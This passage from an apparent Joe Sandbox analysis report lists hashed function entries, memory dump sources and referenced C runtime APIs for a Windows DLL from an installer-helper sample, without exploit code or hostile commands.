                              • Instruction ID: 8811025306f43d2442b0c7ce9dc8999fdd4e889aeb81d0be923fb3b7804228a1
                              • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                              • Instruction Fuzzy Hash: FD31FA7B5049050EF221862E8D843967223FFC2368F2DC76DDD6687FECDA71968781A1
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction ID: 92a599b1699f8d13f312cbf94881285d476b75d033b2de85f89a3702b85d5b3b
                              • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction Fuzzy Hash: AA41B3B19057068BE704CF19C89056AB3E4FF88318F454A6DED5AD7381E330EA55CB91
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction ID: 74e7dd957d892f3e554c47dc16c4403eefe52d0036354a1a80b589f3580baefa
                              • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction Fuzzy Hash: E82148B1A147EA07F7209E6DCCC137577D29BC2305F0D4279DAB08FA87E17984A2D660
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                              • Instruction ID: 0b4395ba64db7d4366e079ec1ee41de6cde06fa3407ab7ea0999caf883d7aea0
                              • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                              • Instruction Fuzzy Hash: 69213A729244254BC301DF5EE889777B3E2FFC431DF678A2BD9928B581C624D880C6A0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                              • Instruction ID: 6dc8373582d36d3d27d2cc0aa072835599c870a85e9e3c13b24291bfc0aa2045
                              • Opcode Fuzzy Hash: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                              • Instruction Fuzzy Hash: 45213B33A011188FC701EF6AD98469B73E6FFC4365F67C63EDD8147644C530E9068650
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction ID: 80c9bca6817d8d530572eb60cb49c83592fb723d5f4b2416861a5d64bb14fa48
                              • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction Fuzzy Hash: 3701817291462E57DB189F48CC41136B390FB85312F49823ADD479B385E734F970C6D4
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eda4edc8969a77ab23eba8bfeacb3ccb98eeec7e899311488295affe48399119
                              • Instruction ID: a71a6ab1cb15c091fdb16f308bc638ea1a472a18d0de41e0ebb140bfbad624f0
                              • Opcode Fuzzy Hash: eda4edc8969a77ab23eba8bfeacb3ccb98eeec7e899311488295affe48399119
                              • Instruction Fuzzy Hash: FBF03031A25724DBCB16CB8CD905B89B3BDEB45B65F128096F501EBA80C7B0EE40C7C4
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction ID: c32f2c0fea54bbd044f4c8e0744b1bd8c8977ce4b8e7866d9d382df2a8cae73c
                              • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction Fuzzy Hash: E1E08C32912678EBCB14CB89D900D8AF3ECEB44A14B1281A6FA02E3A00C674EE40D7C0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                              • API String ID: 3519838083-609671
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aulldiv$H_prolog
                              • String ID: >WJ$x$x
                              • API String ID: 2300968129-3162267903
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 6C9CA077
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6C9CA07F
                              • _ValidateLocalCookies.LIBCMT ref: 6C9CA108
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6C9CA133
                              • _ValidateLocalCookies.LIBCMT ref: 6C9CA188
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 0-537541572
                              APIs
                              • GetConsoleCP.KERNEL32(?,6C9DB640,?), ref: 6C9DC469
                              • __fassign.LIBCMT ref: 6C9DC648
                              • __fassign.LIBCMT ref: 6C9DC665
                              • WriteFile.KERNEL32(?,6C9E6026,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9DC6AD
                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C9DC6ED
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9DC799
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: FileWrite__fassign$ConsoleErrorLast
                              • API String ID: 4031098158-0
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C892F95
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C892FAF
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C892FD0
                              • __Getctype.LIBCPMT ref: 6C893084
                              • std::_Facet_Register.LIBCPMT ref: 6C89309C
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8930B7
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                              • String ID:
                              • API String ID: 1102183713-0
                              • Opcode ID: 54b02fdee8184d5af0457d9287572553ffe8e1631af824746380918195db2908
                              • Instruction ID: da1ee87d390f73b891f1e61935cacdf7f0b594dd63cdece0fceb8ede06d67aba
                              • Opcode Fuzzy Hash: 54b02fdee8184d5af0457d9287572553ffe8e1631af824746380918195db2908
                              • Instruction Fuzzy Hash: 6F417BB1E006158FCB24CF98D954BAEBBB0FF58714F058528D869ABB40D734AA05CF96
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aulldiv$__aullrem
                              • String ID:
                              • API String ID: 2022606265-0
                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction ID: c4b647ede550b6628b37064ec39c8d29397cb7ea7b616392bdff8dc175fa19ad
                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction Fuzzy Hash: B221C170A11219BFDF208E95AD81DCF7AB9EF417ECF248226B520A1690D2718DE4C7B5
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA0A6F1
                                • Part of subcall function 6CA19173: __EH_prolog.LIBCMT ref: 6CA19178
                              • __EH_prolog.LIBCMT ref: 6CA0A8F9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: IJ$WIJ$J
                              • API String ID: 3519838083-740443243
                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction ID: fc6d4f067277b34aeaf4b18eea65d11c6784290ecabf070322870ee952c3812a
                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction Fuzzy Hash: 5471AE31A00254DFDB04CFA4D584BDDB7F1BF24348F1480A9D865ABB91CB74AA8ECB90
                              APIs
                              • _free.LIBCMT ref: 6C9E604D
                              • _free.LIBCMT ref: 6C9E6076
                              • SetEndOfFile.KERNEL32(00000000,6C9E4C5C,00000000,6C9DB640,?,?,?,?,?,?,?,6C9E4C5C,6C9DB640,00000000), ref: 6C9E60A8
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C9E4C5C,6C9DB640,00000000,?,?,?,?,00000000,?), ref: 6C9E60C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: _free$ErrorFileLast
                              • String ID: 8Q
                              • API String ID: 1547350101-4022487301
                              • Opcode ID: 7c905f9bed227d488fac9cdfd1b4e27858367dcd4d6455d9df2bfe2e0780ac39
                              • Instruction ID: 8c3bb4bccea70a7e08f06bbefb44acb5c72ffadd714656187824e0b16b368541
                              • Opcode Fuzzy Hash: 7c905f9bed227d488fac9cdfd1b4e27858367dcd4d6455d9df2bfe2e0780ac39
                              • Instruction Fuzzy Hash: 2041C4B2601619EADB139FA6CC40B8E3679EF7E329F250500E624E7A90D735D4598721
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA1E41D
                                • Part of subcall function 6CA1EE40: __EH_prolog.LIBCMT ref: 6CA1EE45
                                • Part of subcall function 6CA1E8EB: __EH_prolog.LIBCMT ref: 6CA1E8F0
                                • Part of subcall function 6CA1E593: __EH_prolog.LIBCMT ref: 6CA1E598
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: &qB$0aJ$A0$XqB
                              • API String ID: 3519838083-1326096578
                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction ID: c924ae5cc575613609a41bb907e5da559f684bfb7a10fd920e3d626b622539ad
                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction Fuzzy Hash: E221BE71D05248AECB04CFE4DA849DCBBB4AF25318F204029D41663B81DF784E4CCB60
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C9CF724,?,?,6C9CF7A5,?,?,?), ref: 6C9CF6AF
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C9CF6C2
                              • FreeLibrary.KERNEL32(00000000,?,?,6C9CF724,?,?,6C9CF7A5,?,?,?), ref: 6C9CF6E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: d54614bef4e0ef49dfb256a5564119c7a9eba31a4805d594c4357d3f4f228475
                              • Instruction ID: 419e9c04444aa386edbb713a8456db74384b8969fca86a1d587d16b1a0cfead7
                              • Opcode Fuzzy Hash: d54614bef4e0ef49dfb256a5564119c7a9eba31a4805d594c4357d3f4f228475
                              • Instruction Fuzzy Hash: 56F01C3261551DFBEF019B91DA19BDE7F78EB4179AF205060A825A2960CB30CE01DB96
                              APIs
                              • __EH_prolog3.LIBCMT ref: 6C9C789E
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C9C78A9
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C9C7917
                                • Part of subcall function 6C9C77A0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C9C77B8
                              • std::locale::_Setgloballocale.LIBCPMT ref: 6C9C78C4
                              • _Yarn.LIBCPMT ref: 6C9C78DA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                              • String ID:
                              • API String ID: 1088826258-0
                              • Opcode ID: 979cf863c9dcfa0382f0dcb7f1ab25f2db4c5a97fa1daae9990facd269faa02a
                              • Instruction ID: 9ab8925a960e04913d0841bc8f751c8d72502d4375aadde3259d335795872ea0
                              • Opcode Fuzzy Hash: 979cf863c9dcfa0382f0dcb7f1ab25f2db4c5a97fa1daae9990facd269faa02a
                              • Instruction Fuzzy Hash: 340196B5B002129BDB0ADB208850ABC7BB2FFB6644B158048D81257780DF34EA16CB9B
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $!$@
                              • API String ID: 3519838083-2517134481
                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction ID: f9299512e6ef589b83757cf2e2e74ab0048e422328f4282ca0eb4b7b4faf581a
                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction Fuzzy Hash: 40126E74D16289DFCB04CFA8C590ADDBBB1BF49308F148469E845EBB51DB31A9C9CB60
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog__aulldiv
                              • String ID: $SJ
                              • API String ID: 4125985754-3948962906
                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction ID: 3fc6b5e21084b8e8e8433a6ea99866e38a33188cef36865a24b0b92d9daa77aa
                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction Fuzzy Hash: 44B13AB1D04209DFCB14CFA9C9849AEBBF1FF49318B24862EE555A7B50D730EA85CB50
                              APIs
                                • Part of subcall function 6C9C7897: __EH_prolog3.LIBCMT ref: 6C9C789E
                                • Part of subcall function 6C9C7897: std::_Lockit::_Lockit.LIBCPMT ref: 6C9C78A9
                                • Part of subcall function 6C9C7897: std::locale::_Setgloballocale.LIBCPMT ref: 6C9C78C4
                                • Part of subcall function 6C9C7897: _Yarn.LIBCPMT ref: 6C9C78DA
                                • Part of subcall function 6C9C7897: std::_Lockit::~_Lockit.LIBCPMT ref: 6C9C7917
                                • Part of subcall function 6C892F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C892F95
                                • Part of subcall function 6C892F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C892FAF
                                • Part of subcall function 6C892F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C892FD0
                                • Part of subcall function 6C892F60: __Getctype.LIBCPMT ref: 6C893084
                                • Part of subcall function 6C892F60: std::_Facet_Register.LIBCPMT ref: 6C89309C
                                • Part of subcall function 6C892F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8930B7
                              • std::ios_base::_Addstd.LIBCPMT ref: 6C89211B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 3332196525-1866435925
                              • Opcode ID: b8e85e27cf7a350adf714c5a802d9b76d3bdc5093ff27c2f7a1a769c6acd5cd6
                              • Instruction ID: 36670ab575ec49e699f5367657639ca360c19f7f2e9eb685c05f7c5e54df7bb5
                              • Opcode Fuzzy Hash: b8e85e27cf7a350adf714c5a802d9b76d3bdc5093ff27c2f7a1a769c6acd5cd6
                              • Instruction Fuzzy Hash: 2141E4B1E013098FDB10CF68D8457AEBBB0FF48318F108668E915AB791E775E985CB91
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA24ECC
                                • Part of subcall function 6CA0F58A: __EH_prolog.LIBCMT ref: 6CA0F58F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :hJ$dJ$xJ
                              • API String ID: 3519838083-2437443688
                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction ID: f3a1ff7f142c0dbd2b406b1f300061c378c61d3d0fbb8d6f3a1c2a22ab494802
                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction Fuzzy Hash: 4721E9B1911B40CFC760CF6AC14428ABBF4FF29708B00C95EC0AA97B11D7B8A649CF59
                              APIs
                              • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C9DB640,6C891DEA,00008000,6C9DB640,?,?,?,6C9DB1EF,6C9DB640,?,00000000,6C891DEA), ref: 6C9DB339
                              • GetLastError.KERNEL32(?,?,?,6C9DB1EF,6C9DB640,?,00000000,6C891DEA,?,6C9E4C0E,6C9DB640,000000FF,000000FF,00000002,00008000,6C9DB640), ref: 6C9DB343
                              • __dosmaperr.LIBCMT ref: 6C9DB34A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
